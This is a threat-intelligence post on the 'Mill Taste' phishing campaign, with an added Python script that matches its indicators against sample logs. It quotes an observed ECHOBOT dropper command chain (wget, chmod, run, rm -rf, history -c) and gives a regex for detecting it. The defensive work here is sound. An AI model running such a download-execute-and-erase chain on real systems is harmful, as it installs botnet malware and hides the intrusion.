An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: “Mill Taste”) and shows a close-up of a sweet potato or yam on the landing page of the website. The social engineering lure is an email from an “Accounting Manager” named “Melissa Henry” who is sending a “copy” of a paid invoice. The message carries a PDF attachment and the subject line “Paid Invoice TT Copy”. Based on my link analysis, the PDF is infected with malware, which is described below.

Phishing Campaign Cyber Observables

The phishing domain is:  elmolinosabor[.]com

The phishing IP is:  146.112.61[.]107

Recent DNS History

The threat actor appears to have begun building the infrastructure on February 1, 2019, using an admin panel labeled “” at IP: . According to the DNS history tracked by [redacted], the initial test runs of the malicious infrastructure took place on June 5 and June 8 from www1-royalbank[.]cc and www1royalbank-petrocanada[.]com, respectively.

All three of these events show the same ‘Welcome!’ placeholder splash page.

According to the [redacted] tool, the autonomous system announcing the above IP is AS202425, which exhibits multiple security issues, including:

  • Route leaks (4)
  • Hijacks (111)
  • DDoS Amplifiers (326)
  • Static Loops (5)

Malware Artifacts

The most recently seen malware artifact documented on [redacted] is the following Win32 executable: scaalqtw[.]exe (SHA-256: 533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9). As of August 15, 2019, 51 of 70 antivirus engines flagged this file as malicious, including CheckPoint, CrowdStrike, FireEye, F-Secure, Kaspersky, Malwarebytes, McAfee, Microsoft, Panda, Palo Alto Networks, Sophos, TrendMicro, and Symantec. It is variously characterized as a “heuristic” detection, a “downloader”, and a “Grandcrab.AF” Trojan.

As can be seen in the node-graph screenshot (not reproduced here), the executable beacons out to a Seychelles site and to a .zz site (shown as the question mark [?] node in the graph). Numerous “communicating” and referring nodes are also associated with the .zz node, which [redacted] identifies as Hanover Hospital. The cyber observables for this campaign are given below.

Contact CTIN for more information and the complete list of Cyber Observables of the Mill Taste Campaign.

Dropper Site Cyber Observables


Communicating Nodes Cyber Observables

SHA-256: 7fe7a59e34d6c190309219d69fe11900daec7d82e0f6de36716d5068806fc814

Observed command line: /tmp; wget; chmod 777 ECHOBOT.x86; ./ECHOBOT.x86; rm -rf ECHOBOT.x86; history -c
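The observables listed on this page (the phishing domain and IP, the mail subject, the two SHA-256 hashes, and the ECHOBOT command chain in the row above) are only useful once they are matched against your own telemetry. The script below is an added example, not CTIN's code, that refangs the indicators as quoted on the page and runs them over a handful of constructed log lines (mail gateway, proxy, DNS, EDR and honeypot formats are all invented for illustration). It also flags the generic shape of the dropper one-liner above, fetch / chmod / execute / delete / history -c, so that it catches the same chain with a different binary name.

```python
"""Match the Mill Taste campaign observables against sample log lines.

Added example, not part of the original CTIN post. The indicators are the
ones quoted on the page; every log line below is constructed for illustration.
"""
from __future__ import annotations

import re

# Indicators as they appear on the page, in defanged form.
DEFANGED_IOCS = {
    "domain": [
        "elmolinosabor[.]com",
        "www1-royalbank[.]cc",
        "www1royalbank-petrocanada[.]com",
    ],
    "ip": ["146.112.61[.]107"],
    "sha256": [
        "533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9",
        "7fe7a59e34d6c190309219d69fe11900daec7d82e0f6de36716d5068806fc814",
    ],
    "subject": ["Paid Invoice TT Copy"],
}


def refang(indicator: str) -> str:
    """Undo the '[.]' and 'hxxp' defanging so the string matches raw logs."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


# Shape of the ECHOBOT dropper chain from the observables row: fetch a binary,
# chmod it, run it from the current directory, delete it, clear shell history.
# The binary name is captured once and back-referenced so any name is caught.
DROPPER_CHAIN = re.compile(
    r"(wget|curl)\b.*?chmod\s+[0-7]{3}\s+(?P<bin>[^\s;]+)"
    r".*?\./(?P=bin).*?rm\s+-rf\s+(?P=bin).*?history\s+-c",
    re.IGNORECASE,
)


def match_line(line: str) -> list[tuple[str, str]]:
    """Return (indicator_type, indicator) pairs found in one log line."""
    hits: list[tuple[str, str]] = []
    lowered = line.lower()
    for kind, values in DEFANGED_IOCS.items():
        for value in values:
            plain = refang(value)
            if plain.lower() in lowered:
                hits.append((kind, plain))
    if DROPPER_CHAIN.search(line):
        hits.append(("dropper_chain", "wget/chmod/exec/rm/history -c"))
    return hits


def scan(lines: list[str]) -> dict[int, list[tuple[str, str]]]:
    """Map line index -> hits for every line that matched at least one IOC."""
    results: dict[int, list[tuple[str, str]]] = {}
    for idx, line in enumerate(lines):
        hits = match_line(line)
        if hits:
            results[idx] = hits
    return results


# Constructed sample telemetry (formats and sender address are hypothetical).
SAMPLE_LOGS = [
    '2019-08-14T09:12:31Z mta from=<melissa.henry@example.invalid> '
    'subject="Paid Invoice TT Copy" attach=invoice.pdf',
    "2019-08-14T09:13:01Z dns q=elmolinosabor.com a=146.112.61.107",
    "2019-08-14T09:13:02Z proxy 10.0.0.23 GET http://elmolinosabor.com/ 200",
    "2019-08-14T09:15:40Z edr proc=scaalqtw.exe "
    "sha256=533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9",
    '2019-08-14T09:20:00Z honeypot cmd="/tmp; wget; chmod 777 ECHOBOT.x86; '
    './ECHOBOT.x86; rm -rf ECHOBOT.x86; history -c"',
    "2019-08-14T09:21:00Z proxy 10.0.0.24 GET http://example.com/ 200",
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOGS).items():
        print(f"line {idx}: {hits}")
```

Substring matching on the refanged strings is deliberately loose (it will match a subdomain of the phishing domain as well as the apex); tighten with word boundaries if your logs contain look-alike hosts. The dropper regex is the generalisable piece: the original observable had no download URL, and the pattern does not require one, so it fires on the bare chain exactly as recorded above.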

By Jane
